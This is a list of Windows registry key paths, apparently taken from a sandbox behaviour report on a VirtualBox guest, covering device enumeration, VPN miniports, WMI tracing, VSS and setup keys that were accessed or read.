HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\FriendlyName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\DeviceDesc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Properties\{afd97640-86a3-4210-b67c-289c41aabe55} 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\# HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\DeviceDesc HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{eb115ffc-10c8-4964-831d-6dcb02e6f23f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eheadphonewave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eHeadphoneWave\Control HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eHeadphoneWave\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\Properties 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_8384&dev_7680&subsys_83847680&rev_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eheadphonetopo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_8384&dev_7680&subsys_83847680&rev_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eheadphonewave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneWave\Properties HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit 
Read Keys
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ClassGUID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ClassGUID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ContainerID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Legacy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CompatibleIDs 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceHandlers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\LastUpdateTime HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyCacheDate HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\SYSTEM\0000\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Driver 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\FriendlyName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\DeviceDesc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Capabilities 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\DeviceDesc HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eHeadphoneWave\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ConfigFlags 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default) HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) 
